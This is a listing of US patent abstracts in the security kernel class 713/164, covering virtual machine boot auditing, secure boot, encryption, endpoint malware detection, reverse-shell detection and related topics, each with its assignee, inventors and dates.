Security Kernel Or Utility Patents (Class 713/164)
  • Patent number: 10776491
    Abstract: An apparatus and method for collecting an audit trail in a virtual machine boot process, the audit-trail-collecting apparatus including an event detection unit for detecting a software interrupt event, a register state information extraction unit for extracting state information of a CPU register corresponding to a detection time of the software interrupt event, a monitoring unit for monitoring a change in a vector value corresponding to the software interrupt event in an interrupt vector table, a threat occurrence detection unit for detecting a threat occurrence in a virtual machine boot process based on at least one of the CPU register state information and a monitored result, and an audit trail collection unit for storing an audit trail corresponding to at least one of the CPU register state information and the monitored result when the threat occurrence is detected in the virtual machine boot process.
    Type: Grant
    Filed: March 28, 2018
    Date of Patent: September 15, 2020
    Assignee: ELECTRONICS AND TELECOMMUNICATIONS RESEARCH INSTITUTE
    Inventors: Sung-Jin Kim, Hyunyi Yi, Seong-Joong Kim, Woomin Hwang, Byung-Joon Kim, Chulwoo Lee, Hyoung-Chun Kim
  • Patent number: 10778814
    Abstract: A system and method for classifying packets according to packet header field values. Each of a set of subkey tables is searched for a respective packet header field value; each such search results in a value for a subkey. The subkeys are combined to form a decision key. A decision table is then searched for the decision key. The search of the decision table results in an action code and a reason code, one or both of which may be used to determine how to further process the packet.
    Type: Grant
    Filed: January 24, 2018
    Date of Patent: September 15, 2020
    Assignee: Rockley Photonics Limited
    Inventors: Chiang Yeh, German Rodriguez Herrera, Bhaskar Chowdhuri
  • Patent number: 10747875
    Abstract: Disclosed embodiments relate to secure and reliable customization of operating system kernels. Techniques include configuring a kernel security module for loading to an operating system kernel to run kernel-level scripts on the kernel, the kernel security module being configured to perform a security verification comprising operations of: identifying, at the kernel security module, a script received at the kernel security module for requested execution by the kernel, and verifying whether the script has a valid signature; determining, at the kernel security module and based on the security verification, whether to permit the script to be processed by the kernel; and identifying, based on the determining, executable code corresponding to the script to execute at the kernel.
    Type: Grant
    Filed: March 19, 2020
    Date of Patent: August 18, 2020
    Assignee: CyberArk Software Ltd.
    Inventor: Nimrod Stoler
  • Patent number: 10747905
    Abstract: In one example, a first enclave for use by a first counterparty to a smart contract is identified. A second enclave for use by a second counterparty to the smart contract may be identified. Secrets associated with the first counterparty to the first enclave may be caused to be securely provided. Secrets associated with the second counterparty to the second enclave may be caused to be securely provided. A cryptlet is caused to be provided to the first enclave. The cryptlet may be caused to be provided to the second enclave. A payload is received from the first enclave. A payload may be received from the second enclave. Validation may be caused to be performed for a plurality of payloads. The plurality of payloads may include the payload from the first enclave and the payload from the second enclave.
    Type: Grant
    Filed: June 23, 2017
    Date of Patent: August 18, 2020
    Assignee: Microsoft Technology Licensing, LLC
    Inventor: John Marley Gray
  • Patent number: 10742663
    Abstract: Systems and methods for providing security services during a power management mode are disclosed. In some embodiments, a method comprises detecting with a mobile security system a wake event on a mobile device, providing from the mobile security system a wake signal, the providing being in response to the wake event to wake a mobile device from a power management mode, and managing with the mobile security system security services of the mobile device. Managing security services may comprise scanning a hard drive of the mobile devices for viruses and/or other malware. Managing security services may also comprise updating security applications or scanning the mobile device for unauthorized data.
    Type: Grant
    Filed: October 14, 2019
    Date of Patent: August 11, 2020
    Assignee: CUPP Computing AS
    Inventors: Ami Oz, Shlomo Touboul
  • Patent number: 10740488
    Abstract: A computer implemented method for data anonymization comprises: receiving a request for data that needs anonymization. The request comprises at least one field descriptor of data to be retrieved and a usage scenario of a user for the requested data. Then, based on the usage scenario, an anonymization algorithm to be applied to the data that is referred to by the field descriptor is determined. Subsequently, the determined anonymization algorithm is applied to the data that is referred to by the field descriptor. A testing is performed, as to whether the degree of anonymization fulfills a requirement that is related to the usage scenario. In the case, the requirement is fulfilled, access to the anonymized data is provided.
    Type: Grant
    Filed: November 17, 2017
    Date of Patent: August 11, 2020
    Assignee: INTERNATIONAL BUSINESS MACHINES CORPORATION
    Inventors: Albert Maier, Martin Oberhofer, Yannick Saillet
  • Patent number: 10740125
    Abstract: An example system includes at least one memristive dot product engine (DPE) having at least one resource, the DPE further having a physical interface and a controller, the controller being communicatively coupled to the physical interface, the physical interface to communicate with the controller to access the DPE, and at least one replicated interface, each replicated interface being associated with a virtual DPE, the replicated interface with communicatively coupled to the controller. The controller is to allocate timeslots to the virtual DPE through the associated replicated interface to allow the virtual DPE access to the at least one resource.
    Type: Grant
    Filed: January 30, 2018
    Date of Patent: August 11, 2020
    Assignee: Hewlett Packard Enterprise Development LP
    Inventors: Geoffrey Ndu, Dejan Milojicic, Sai Rahul Chalamalasetti
  • Patent number: 10733284
    Abstract: A method and apparatus are provided for secure communication. The method includes binding an isolated environment, of a device, to a secure component. The secure component includes a secure application and data. The method also includes utilizing the isolated environment as an intermediary for communication of the data between the secure application and the device.
    Type: Grant
    Filed: October 6, 2016
    Date of Patent: August 4, 2020
    Assignee: Samsung Electronics Co., Ltd.
    Inventors: Antonios Dimitrios Broumas, Naman R. Patel
  • Patent number: 10733616
    Abstract: A computerized system and method may include, in response to receiving a blockchain via a communications network that includes information associated with an event, parsing, by a blockchain parsing engine being executed by a blockchain node, the information to identify a status state of an item related to the event. The blockchain may be inclusive of the information along with the status state of the item may be stored in a storage unit. An event tracking engine may determine from the parsed information that the status state of the item transitioned from a first state to a second state. Responsive to the event tracking engine determining that a qualifying state is satisfied by the item being in the second state, automatically executing, by the blockchain node, a smart code inclusive of initiating communications between a first party and a second party.
    Type: Grant
    Filed: October 20, 2017
    Date of Patent: August 4, 2020
    Assignee: Massachusets Mutual Life Insurance Company
    Inventors: Jennifer Rutley, Abigail Jennings O'malley
  • Patent number: 10719606
    Abstract: Dynamic Trust Manager (DTM) having an interface coupled to an embedded system including an Application Processor (AP), boot media, and security processor. The security processor, at a start of a boot sequence of the AP, prevents the AP from proceeding with the boot sequence, verifies bootloader code stored in the boot media via boot media access, and if the bootloader code verification is successful, allows the AP to proceed using the verified bootloader code. The security processor may also be configured to activate an interrupt request of the AP during runtime, request the AP to execute a Security Monitor Driver (SMD) of the embedded system to measure an integrity information of code/data stored in an embedded system memory, receive from the SMD the measured integrity information of code/data, and verify whether the measured integrity information equals a reference integrity information stored in an integrity table of a DTM memory.
    Type: Grant
    Filed: February 23, 2018
    Date of Patent: July 21, 2020
    Assignee: Infineon Technologies AG
    Inventors: Oscar David Sanchez Diaz, Jurijus Cizas, Jeffrey Kelley, Mark Stafford
  • Patent number: 10719627
    Abstract: A computer implemented method for data anonymization comprises: receiving a request for data that needs anonymization. The request comprises at least one field descriptor of data to be retrieved and a usage scenario of a user for the requested data. Then, based on the usage scenario, an anonymization algorithm to be applied to the data that is referred to by the field descriptor is determined. Subsequently, the determined anonymization algorithm is applied to the data that is referred to by the field descriptor. A testing is performed, as to whether the degree of anonymization fulfills a requirement that is related to the usage scenario. In the case, the requirement is fulfilled, access to the anonymized data is provided.
    Type: Grant
    Filed: April 23, 2019
    Date of Patent: July 21, 2020
    Assignee: INTERNATIONAL BUSINESS MACHINES CORPORATION
    Inventors: Albert Maier, Martin Oberhofer, Yannick Saillet
  • Patent number: 10719623
    Abstract: A system includes profile control circuitry that may receive a sovereign onboarding command. The sovereign onboarding command may be issued on behalf of a sovereign associated with a profile. The sovereign onboarding command may update a status value in the profile. The profile may be recorded on a data-tamper-protected distributed ledger. Arbitration circuitry may review the recorded profile status value and ensure that status values are enforced against the sovereign during exchanges.
    Type: Grant
    Filed: February 17, 2020
    Date of Patent: July 21, 2020
    Assignee: Accenture Global Solutions Limited
    Inventors: Patricia A. Miller, Scott W. Perkins, Shane R. Marshall, Peter Bidewell, Rodrigo Yukio Ieto
  • Patent number: 10708656
    Abstract: In some aspects, a mobile application package is bound to a privileged component of a mobile device operating system. The mobile application package includes a software virtualization layer and a management service component. The software virtualization layer and the management service component are enabled to execute in a privileged mode based on the privileged component. A virtual phone image is downloaded from a management server. A virtual machine based on the virtual phone image is launched by the software virtualization layer.
    Type: Grant
    Filed: July 25, 2018
    Date of Patent: July 7, 2020
    Assignee: VMWARE, INC.
    Inventors: Stephen Deasy, Craig Newell, Emil Sit, Paul Wisner, David Furodet, Viktor Gyuris, Robert Meyer, Fanny Strudel
  • Patent number: 10691445
    Abstract: Techniques for isolating a portion of an online computing service referred to as a deployment unit and configured with a complete build of the online computing service may include routing production traffic away from the deployment unit, applying one or more changes to the complete build, and after applying one or more changes to the complete build, using the deployment unit for testing these changes using end-to-end tests. In one embodiment, the deployment unit may be dedicated to a specific group of tenants that require at least some isolation from other tenants.
    Type: Grant
    Filed: June 27, 2018
    Date of Patent: June 23, 2020
    Assignee: Microsoft Technology Licensing, LLC
    Inventors: Nakul Garg, Ricardo Stern, Neelamadhaba Mahapatro, Rui Chen, Michael Wilde, Charles Jeffries
  • Patent number: 10691824
    Abstract: Securing an endpoint against exposure to unsafe content includes encrypting files to prevent unauthorized access, and monitoring an exposure state of a process to potentially unsafe content by applying behavioral rules to determine whether the exposure state is either exposed or secure, where (1) the process is initially identified as secure, (2) the process is identified as exposed when the process opens a network connection to a URL that is not internal to an enterprise network of the endpoint and that has a poor reputation, (3) the process is identified as exposed when it opens a file identified as exposed, and (4) the process is identified as exposed when another exposed process opens a handle to the process. Access to the files may be restricted when the process is exposed by controlling access through a file system filter that conditionally decrypts files for the process according to its exposure state.
    Type: Grant
    Filed: January 15, 2019
    Date of Patent: June 23, 2020
    Assignee: Sophos Limited
    Inventors: Kenneth D. Ray, Andrew J. Thomas, Anthony John Merry, Harald Schütz, Andreas Berger, John Edward Tyrone Shaw
  • Patent number: 10685117
    Abstract: A target file is run in an installation package. A secure dynamic library is loaded in the installation package. Based on a code in the target file, digital watermark information embedded in the target file and verification information stored in the secure dynamic library is retrieved. Based on the digital watermark information and the verification information, a determination is made whether the installation package is a repackaged installation package.
    Type: Grant
    Filed: April 11, 2019
    Date of Patent: June 16, 2020
    Assignee: Alibaba Group Holding Limited
    Inventors: Yaoguang Chen, Jiashui Wang
  • Patent number: 10673614
    Abstract: The present invention is provided with an encryption similarity calculation unit to calculate an encryption similarity being a similarity degree between storage data and search data encrypted using a homomorphic encryption, by performing a homomorphic operation on storage encryption data being the storage data encrypted using the homomorphic encryption, and search encryption data being the search data encrypted using the homomorphic encryption, the search data being used in search of the storage data, and an encryption result transmission unit to generate an encryption search result to represent whether or not the similarity degree is not more than a threshold value ? by using the encryption similarity, and to transmit the encryption search result to a search device.
    Type: Grant
    Filed: October 9, 2015
    Date of Patent: June 2, 2020
    Assignee: MITSUBISHI ELECTRIC CORPORATION
    Inventors: Takato Hirano, Yutaka Kawai
  • Patent number: 10664596
    Abstract: There is provided a system and a computer-implemented method of detecting malware in real time in a live environment. The method comprises: monitoring one or more operations of at least one program concurrently running in the live environment, building at least one stateful model in accordance with the one or more operations, analyzing the at least one stateful model to identify one or more behaviors, and determining the presence of malware based on the identified one or more behaviors.
    Type: Grant
    Filed: June 15, 2017
    Date of Patent: May 26, 2020
    Assignee: Sentinel Labs Israel Ltd.
    Inventors: Tomer Weingarten, Almog Cohen, Udi Shamir, Kirill Motil
  • Patent number: 10666677
    Abstract: An exemplary system method, and computer-accessible medium for initiating a protocol(s) can be provided, which can include, for example, generating a digitally encrypted perishable object(s), distributing the digitally encrypted perishable object(s) to a cyber-physical entity(s), determining if the cyber-physical entity(s) has received the digitally encrypted perishable object(s), and initiating at a predetermined protocol(s) based on the determination.
    Type: Grant
    Filed: September 23, 2015
    Date of Patent: May 26, 2020
    Assignees: New York University, Carnegie Mellon University
    Inventors: Will Casey, Bhubaneswar Mishra
  • Patent number: 10666618
    Abstract: When a computer system is compromised by a malicious user, detecting or preventing the malicious user can improve the security and efficiency of the computer system, as well as prevent data from being deleted or corrupted and/or stolen. An attacker who compromises a computer system is likely to take certain actions to exert control over the computer or avoid detection. When a compromised system is behind a network firewall, the attacker may seek to open a remote reverse shell on the compromised system to more easily issue commands, as the firewall may block direct attempts from outside the network to contact the compromised system. Detecting a reverse shell can be difficult, slow, and unreliable, however. The present disclosure discusses methods for detecting reverse shells based on analyzing redirection of data streams such as STDIN, STDOUT, and STDERR.
    Type: Grant
    Filed: September 15, 2016
    Date of Patent: May 26, 2020
    Assignee: PAYPAL, INC.
    Inventor: Shlomi Boutnaru
  • Patent number: 10657277
    Abstract: Securing an endpoint against exposure to unsafe content includes encrypting files to prevent unauthorized access, and monitoring an exposure state of a process to potentially unsafe content by applying behavioral rules to determine whether the exposure state is either exposed or secure, where (1) the process is initially identified as secure, (2) the process is identified as exposed when the process opens a network connection to a URL that is not internal to an enterprise network of the endpoint and that has a poor reputation, (3) the process is identified as exposed when it opens a file identified as exposed, and (4) the process is identified as exposed when another exposed process opens a handle to the process. Access to the files may be restricted when the process is exposed by controlling access through a file system filter that conditionally decrypts files for the process according to its exposure state.
    Type: Grant
    Filed: November 20, 2017
    Date of Patent: May 19, 2020
    Assignee: Sophos Limited
    Inventors: Kenneth D. Ray, Andrew J. Thomas, Anthony John Merry, Harald Schütz, Andreas Berger, John Edward Tyrone Shaw
  • Patent number: 10649964
    Abstract: Various examples are directed to systems and methods for managing a database to include data from an external data source. A database engine may receive a request to add a reference column to a database described by a database schema. The request may comprise a location parameter describing a location of the external data source comprising data for populating the reference column and a data identifying parameter describing data at the external data source for populating the reference column. The database engine may modify the database schema to include the reference column, send a query to the external data source to obtain at least one data item for populating the reference column, and populate the reference column with the at least one data item.
    Type: Grant
    Filed: February 26, 2015
    Date of Patent: May 12, 2020
    Assignee: Red Hat, Inc.
    Inventors: Filip Nguyen, Filip Elias
  • Patent number: 10614252
    Abstract: A distributed file integrity checking system is described. The described peer integrity checking system (PICS) may negate an attack by storing a properties database amongst nodes of a peer-to-peer network of hosts, some or all of which co-operate to protect and watch over each other.
    Type: Grant
    Filed: August 31, 2017
    Date of Patent: April 7, 2020
    Assignee: ARCHITECTURE TECHNOLOGY CORPORATION
    Inventors: Barry A. Trent, Edward R. Mandy
  • Patent number: 10594670
    Abstract: Systems and methods are disclosed for encrypting portions of data for storage and processing in a remote network. For example, methods may include receiving a message that includes data for forwarding to a server device; encrypting a portion of the data to determine an encrypted portion; determining metadata based on the portion of the data, wherein the metadata indicates one or more properties of the portion of the data and enables one or more operations to be performed by the server device that depend on the one or more properties; determining a payload including the data with both the encrypted portion and the metadata substituted for the portion of the data; and transmitting the payload to the server device.
    Type: Grant
    Filed: May 30, 2017
    Date of Patent: March 17, 2020
    Assignee: ServiceNow, Inc.
    Inventors: Pierre Francois Rohel, Siddharth Shah, Martin Wexler
  • Patent number: 10594668
    Abstract: In one embodiment, a crypto cloudlet is provided that includes a security wrapper to a virtual machine to guarantee secure Input/Output exchange between a client and one or more cryptographic adaptive services powered by a set of virtual CPUs through a single well defined channel, an adaptive service running in the virtual machine that identifies hardware resources necessary to satisfy a cryptographic demand or request, and an Ethernet interface communicatively coupled to the security wrapper providing network channel services for exchange of cryptographic data and commands. The security wrapper presents to the adaptive services the hardware accelerators exposed by the virtual machine. Other embodiments are disclosed.
    Type: Grant
    Filed: February 10, 2017
    Date of Patent: March 17, 2020
    Assignee: Thales eSecurity, Inc.
    Inventors: Enrique Sanchez, Bernardo Arainty, John Perret, Tomas Arredondo, Pedro Valladares, Guillermo Cordon, Sergio Barcala, Marc Boillot
  • Patent number: 10579412
    Abstract: A method for operating virtual machines on a virtualization platform includes: embedding control information in a predetermined memory area of a front-end virtual machine where at least one virtual device is to be initialized, the control information being required for initiating a communication with a back-end virtual machine where at least one back-end driver runs; retrieving, by the front-end virtual machine, the control information from the predetermined memory area of the front-end virtual machine; and performing the communication between the front-end virtual machine and the back-end virtual machine via a direct communication channel to exchange information for initializing the at least one virtual device of the front-end virtual machine, by communicating with the at least one back-end driver via the direct communication channel. The direct communication channel is established based on the control information embedded in the predetermined memory area of the front-end virtual machine.
    Type: Grant
    Filed: April 7, 2017
    Date of Patent: March 3, 2020
    Assignee: NEC CORPORATION
    Inventors: Filipe Manco, Simon Kuenzer, Florian Schmidt, Felipe Huici
  • Patent number: 10574466
    Abstract: An external biometric reader and verification device for providing access control to a computing device, and associated methods, are disclosed. The external reader can store and verify biometrics under the control of the computing device and send identity verification messages to the computing device. One disclosed device includes a biometric reader communicatively connected to an external secure microcontroller. The external secure microcontroller stores a set of biometric data and a signing key. The signing key can be injected by a device manufacturer in a controlled key injection room in a manufacturing facility and can be used to sign a certificate. An operating system of the computing device can be programmed to send a request for the certificate, receive the certificate, and predicate control of access to the operating system using the verification messages on verification of the certificate.
    Type: Grant
    Filed: July 11, 2019
    Date of Patent: February 25, 2020
    Assignee: Clover Network, Inc.
    Inventors: Narayanan Gopalakrishnan, Yi Sun, Ketan Patwardhan
  • Patent number: 10567394
    Abstract: A system performs cryptographic operations utilizing information usable to verify validity of plaintext. To prevent providing information about a plaintext by providing the information usable to verify the validity of the plaintext, the system provides the information usable to verify validity of the plaintext to an entity on a condition that the entity is authorized to access the plaintext. The information usable to verify validity of the plaintext may be persisted in ciphertext along with the plaintext to enable the plaintext to be verified when decrypted.
    Type: Grant
    Filed: April 10, 2019
    Date of Patent: February 18, 2020
    Assignee: Amazon Technologies, Inc.
    Inventors: Gregory Branchek Roth, Gregory Alan Rubin, Matthew John Campagna, Petr Praus
  • Patent number: 10567566
    Abstract: An approach is provided for providing mechanisms to control unattended notifications at a device. The approach includes determining that at least one notification presented at a device is an unattended notification. The approach also includes causing, at least in part, a presentation of one or more mechanisms for controlling the unattended notification at the device, one or more other devices, or a combination thereof.
    Type: Grant
    Filed: October 16, 2012
    Date of Patent: February 18, 2020
    Assignee: Nokia Technologies Oy
    Inventors: Wenwei Xue, Likhang Chow
  • Patent number: 10534910
    Abstract: Approaches for monitoring a host operating system. A threat model is stored and maintained. The threat model identifies for any process executing on a host operating system how trustworthy the process should be deemed based on a pattern of observed behavior. The execution of the process and those processes in a monitoring circle relationship thereto are monitored. The monitoring circle relationship includes a parent process, any process in communication with a member of monitoring circle relationship, and any process instantiated by a present member of monitoring circle relationship. Observed process behavior is correlated with the threat model. Upon determining that a particular process has behaved in a manner inconsistent with a pattern of allowable behavior identified by the threat model for that process, a responsive action is taken.
    Type: Grant
    Filed: September 21, 2017
    Date of Patent: January 14, 2020
    Assignee: Hewlett-Packard Development Company, L.P.
    Inventor: Rahul C. Kashyap
  • Patent number: 10514945
    Abstract: A hypervisor monitors for an initialization of a guest kernel running on a virtual machine implemented by the hypervisor. When the initialization of the guest kernel is detected, the hypervisor pauses a virtual processor of the virtual machine, locates a guest kernel image of the guest kernel in guest memory, locates a kernel function in the guest kernel image, inserts a breakpoint on the guest kernel function, resumes the virtual processor and monitors for a breakpoint instruction. After detecting the breakpoint instruction, the hypervisor gathers guest context by examining the guest memory and guest registers, pauses the virtual processor, constructs and injects a code gadget configured to run in the virtual machine, diverts the virtual processor to execute the code gadget, which causes the virtual processor to call the hypervisor at the end of executing the code gadget, and returns the virtual processor to execute the guest kernel function.
    Type: Grant
    Filed: February 7, 2018
    Date of Patent: December 24, 2019
    Assignee: NICIRA, INC.
    Inventor: Prasad Dabak
  • Patent number: 10514959
    Abstract: The present invention describes a distributed operating system that allows any local operating system to run more than one cloud-hosted virtual machine. The described system uses three different server clusters: one for storing, one for general processing and other for image processing. The processed image is sent to the user over the network, all the user needs is a screen to display the final image and an input terminal as a touch screen or a mouse and keyboard.
    Type: Grant
    Filed: December 27, 2013
    Date of Patent: December 24, 2019
    Assignee: SAMSUNG ELECTRONÔNICA DA AMAZÔNIA LTDA.
    Inventor: Paulo Vitor Sato
  • Patent number: 10511965
    Abstract: A system and method for downloading software is provided. When software is required to be downloaded to the mobile terminal, a software downloading tool on the computer terminal establishes a connection with the mobile terminal via a preloader port of the mobile terminal and sends a download agent to the mobile terminal. A preloader program of the mobile terminal checks whether the download agent is signed and encrypted by a private key matched with an RSA public key in the preloader program, and if yes, the mobile terminal utilizes the DA download agent to download the software. The method can effectively prevent illegal tools from having communication capability with the mobile phone by USB connection for data deletion or tampering, and reduce the possibility that a hacker damages “limiting function” of the mobile phone.
    Type: Grant
    Filed: June 30, 2017
    Date of Patent: December 17, 2019
    Assignee: HuiZhou TCL Mobile Communication Co., Ltd.
    Inventors: Haihui Jiang, Bo Wang
  • Patent number: 10503237
    Abstract: The invention provides multiple secure virtualized environments operating in parallel with optimal resource usage, power consumption and performance. The invention provides a method whereby virtual machines (VMs) have direct access to the computing system's hardware without adding traditional virtualization layers while the hypervisor maintains hardware-enforced isolation between VMs, preventing risks of cross-contamination. Additionally, some of the VMs can be deactivated and reactivated dynamically when needed, which saves the computing system resources. As a result, the invention provides bare-metal hypervisor use and security but without the limitations that make such hypervisors impractical, inefficient and inconvenient for use in mobile devices due to the device's limited CPU and battery power capacity.
    Type: Grant
    Filed: February 13, 2017
    Date of Patent: December 10, 2019
    Assignee: GBS Laboratories, LLC
    Inventor: Oleksii Surdu
  • Patent number: 10485286
    Abstract: A shoe is provided for use by a user and for use with an external reset system that is operable to transmit a reset signal. The shoe comprises a sole, a detector, a memory, a controller, and a receiver. The sole has a top surface for supporting the foot of the user when being worn by the user. The detector generates a parameter signal based on a detected parameter. The controller generates a control signal to activate said detector. The controller further generates a modification signal based on the received reset signal. The memory stores parameter data based on the parameter signal. The memory further modifies the stored parameter data based on the modification signal. The receiver receives the reset signal.
    Type: Grant
    Filed: July 15, 2016
    Date of Patent: November 26, 2019
    Assignee: Under Armour, Inc.
    Inventors: Mark Oleson, F. Grant Kovach, Nathan Dau, Angela Nelligan
  • Patent number: 10482257
    Abstract: A method to enforce secure boot policy in an IHS configured with a plurality of virtual machines. The method includes detecting a request for a virtual machine to access a service processor. In response to detecting the request, the method includes triggering a handshake request between a hypervisor boot emulator and the service processor to initiate a sequence of authentication steps to access a corresponding secure partition of memory from among a plurality of secure partitions of memory associated with the service processor. Each secure partition of memory has a corresponding virtual platform key for preserving secure access to the corresponding secure partition of memory stored in a secure platform. The method further includes dynamically generating unlock keys, derived in part by the corresponding virtual platform key, to authenticate a requesting virtual machine as a valid virtual machine to obtain access to a corresponding secure partition of memory.
    Type: Grant
    Filed: March 16, 2017
    Date of Patent: November 19, 2019
    Assignee: Dell Products, L.P.
    Inventors: Shekar Babu Suryanarayana, Sumanth Vidyadhara, Chandrasekhar Puthillathe
  • Patent number: 10484423
    Abstract: A system for collection and analysis of forensic and event data comprising a server and an endpoint agent operating on a remote system. The server is configured to receive event data including process creation data, persistent process data, thread injection data, network connection data, memory pattern data, or any combination thereof, and analyze the event data to detect compromises of a remote system. The endpoint agent is configured to acquire event data, and communicate the event data to the server.
    Type: Grant
    Filed: February 17, 2017
    Date of Patent: November 19, 2019
    Assignee: SecureWorks Corp.
    Inventors: Ross R. Kinder, Aaron Hackworth, Matthew K. Geiger, Kevin R. Moore, Timothy M. Vidas
  • Patent number: 10474589
    Abstract: The present embodiments relate to methods and apparatuses for side-band management of security for server computers. According to certain aspects, such management is directed to the security of data that is stored under the local control of the server, as well as data that flows through the network ports of the server. Such locally stored data is secured by encryption, and the encryption keys are managed by a management entity that is separate from the server. The management entity can also manage the security of network data flowing through the server using its own configuration of network security applications such as firewalls, monitors and filters.
    Type: Grant
    Filed: March 2, 2016
    Date of Patent: November 12, 2019
    Assignee: JANUS TECHNOLOGIES, INC.
    Inventor: Sofin Raskin
  • Patent number: 10474815
    Abstract: Devices, systems, and methods of detecting user identity, differentiating between users of a computerized service, and detecting a possible attacker. The methods include monitoring of user-side input-unit interactions, in general and in response to an interference introduced to user-interface elements. The monitored interactions are used for detecting an attacker that utilizes a remote access channel; for detecting a malicious automatic script, as well as malicious code injection; to identify a particular hardware assembly; to perform user segmentation or user characterization; to enable a visual login process with implicit two-factor authentication; to enable stochastic cryptography; and to detect that multiple users are utilizing the same subscription account.
    Type: Grant
    Filed: December 8, 2016
    Date of Patent: November 12, 2019
    Assignee: BIOCATCH LTD.
    Inventor: Avi Turgeman
  • Patent number: 10474382
    Abstract: Systems and methods for fast storage allocation for encrypted storage are disclosed. An example method may include receiving, by a processing device executing a hypervisor, an identification of a first storage block that has been released by a first virtual machine; tracking, by the hypervisor, an encryption status corresponding to the first storage block to indicate whether the first storage block contains encrypted content; receiving a request to allocate storage to a second virtual machine; analyzing, by the hypervisor, the first storage block to determine that the first storage block contains encrypted content in view of the encryption status corresponding the first storage block; and allocating the first storage block containing the encrypted content to the second virtual machine without clearing the encrypted content of the first storage block.
    Type: Grant
    Filed: December 1, 2017
    Date of Patent: November 12, 2019
    Assignee: Red Hat, Inc.
    Inventors: Henri Han Van Riel, Nitesh Narayan Lal
  • Patent number: 10474813
    Abstract: A technique injects code into a suspicious process containing malware executing on a node to enable remediation at the node. Illustratively, the technique may inject code into the suspicious process during instrumentation of the malware in a micro-virtual machine (VM) to monitor malicious behavior and to enable remediation of that behavior at a node embodied as an endpoint. According to the technique, code may be injected into the suspicious process during instrumentation in the micro-VM of the endpoint to restore states of kernel resources (e.g., memory) that may be infected (i.e., altered) by behavior (actions) of the malware.
    Type: Grant
    Filed: October 23, 2015
    Date of Patent: November 12, 2019
    Assignee: FireEye, Inc.
    Inventor: Osman Abdoul Ismael
  • Patent number: 10476853
    Abstract: A system and method for homomorphic encryption in a healthcare network environment is provided and includes receiving digital data over the healthcare network at a data custodian server in a plurality of formats from various data sources, encrypting the data according to a homomorphic encryption scheme, receiving a query at the data custodian server from a data consumer device concerning a portion of the encrypted data, initiating a secure homomorphic work session between the data custodian server and the data consumer device, generating a homomorphic work space associated with the homomorphic work session, compiling, by the data custodian server, a results set satisfying the query, loading the results set into the homomorphic work space, and building an application programming interface (API) compatible with the results set, the API facilitating encrypted analysis on the results set in the homomorphic work space.
    Type: Grant
    Filed: December 20, 2018
    Date of Patent: November 12, 2019
    Assignee: NANTHEALTH, INC
    Inventors: Patrick Soon-Shiong, Harsh Kupwade-Patil, Ravi Seshadri, Nicholas J. Witchey
  • Patent number: 10476891
    Abstract: A system includes one or more “BotMagnet” modules that are exposed to infection by malicious code. The BotMagnets may include one or more virtual machines hosing operating systems in which malicious code may be installed and executed without exposing sensitive data or other parts of a network. In particular, outbound traffic may be transmitted to a Sinkhole module that implements a service requested by the outbound traffic and transmits responses to the malicious code executing within the BotMagnet. Dark space in a network (unused IP addresses, unused ports and absent applications, and invalid usernames and passwords) is consumed by a BotSink such that attempts to access Darkspace resources will be directed to the BotSink, which will engage the source host of such attempts.
    Type: Grant
    Filed: July 21, 2015
    Date of Patent: November 12, 2019
    Assignee: ATTIVO NETWORKS INC.
    Inventors: Venu Vissamsetty, Srikant Vissamsetti, Shivakumar Buruganahalli
  • Patent number: 10469622
    Abstract: Embodiments include processes, systems, and devices for initiating proximity actions upon the activation of a proximity connection. A proximity service receives an indication from a proximity provider that a proximity connection is established, and then determines a joint proximity context of the proximity connection. The proximity service then initiates a proximity action to facilitate a proximity function indicated by the joint proximity context. Joint proximity contexts include indications that an application has queued content to be shared with a proximity device, that an application has registered to publish messages on a namespace, that an application has subscribed to messages on a namespace, that an application has registered to find a peer application on a proximity device to enable multi-user collaboration, and that a device seeks to pair with another device.
    Type: Grant
    Filed: October 20, 2017
    Date of Patent: November 5, 2019
    Assignee: Microsoft Technology Licensing, LLC
    Inventors: Marc Christopher Pottier, Max Glenn Morris, Travis J. Martin, Michael N. Loholt, Darren R. Davis, Priya Bhushan Dandawate, Kenton A. Shipley, Khurram M. Zia
  • Patent number: 10467632
    Abstract: Embodiments of systems and methods for fraud review are disclosed. The systems may comprise multi-tiered computing systems which may receive fraud alerts from multiple sources. A computing system in a tier may receive a fraud alert and use one or more fraud risk metrics to determine whether the fraud alert should be escalated. If the computing system determines that the fraud alert should be escalated, the computing system may transmit an escalation message to a higher tier computing system. If the computing system determines that the fraud alert should not be escalated, the computing system may transmit a message to a fraud prevention computing system. In some embodiments, the computing system may determine that the fraud alert is a false positive and transmit a false positive message to the source of the fraud alert such as a lower tier computing system.
    Type: Grant
    Filed: December 13, 2017
    Date of Patent: November 5, 2019
    Assignee: Massachusetts Mutual Life Insurance Company
    Inventor: Sears Merritt
  • Patent number: 10469444
    Abstract: The invention presented herein is a system and method for automatically discovering communication capabilities for direct communication between endpoints across one or more unknown networks, the system comprising: a plurality of network-enabled endpoints configured with a module in wireless communication with a management database, the module configured to establish a communication path for direct communication between the network-enabled endpoints, independent of a NAT router.
    Type: Grant
    Filed: October 25, 2018
    Date of Patent: November 5, 2019
    Assignee: IP Technology Labs, LLC
    Inventors: Gary Mitchell, Scott Whittle, Kurt Quasebarth
  • Patent number: 10462136
    Abstract: In one embodiment, a request may be received from a first cloud network of a hybrid cloud environment to transmit data to a second cloud network of the hybrid cloud environment, wherein the request can include a security profile related to the data. The security profile may be automatically analyzed to determine access permissions related to the data. Based at least in part on the access permissions, data can be allowed to access to the second cloud network.
    Type: Grant
    Filed: October 13, 2015
    Date of Patent: October 29, 2019
    Assignee: CISCO TECHNOLOGY, INC.
    Inventors: Mauricio Arregoces, Nagaraj Bagepalli, Subramanian Chandrasekaran
  • Patent number: 10452365
    Abstract: A computer program product according to some embodiments causes a processor to perform operations including disassembling executable code of an application program to provide disassembled code, identifying first wrapping code in the disassembled code, receiving second wrapping code, generating a consolidated application wrapper that manages operation of both the first wrapping code and the second wrapping code, inserting the second wrapping code and the consolidated application wrapper into the disassembled code to form modified disassembled code, and assembling the modified disassembled code to form modified executable code.
    Type: Grant
    Filed: October 19, 2017
    Date of Patent: October 22, 2019
    Assignee: CA, Inc.
    Inventor: Vikrant Nandakumar
  • Patent number: 10445223
    Abstract: Various embodiments are generally directed to techniques of creating or managing one or more virtual services using at least one application programming interface (API). At a plugin layer, a plugin integrator programmatically interfaces with and integrates one or more virtualization tools. The plugin integrator may be programmatically interfaced with the at least one API. At least one proxy agent may be used to run or consumer the one or more virtual services. The at least one API and the at least one proxy agent may be implemented in an abstraction layer.
    Type: Grant
    Filed: October 25, 2018
    Date of Patent: October 15, 2019
    Assignee: CAPITAL ONE SERVICES, LLC
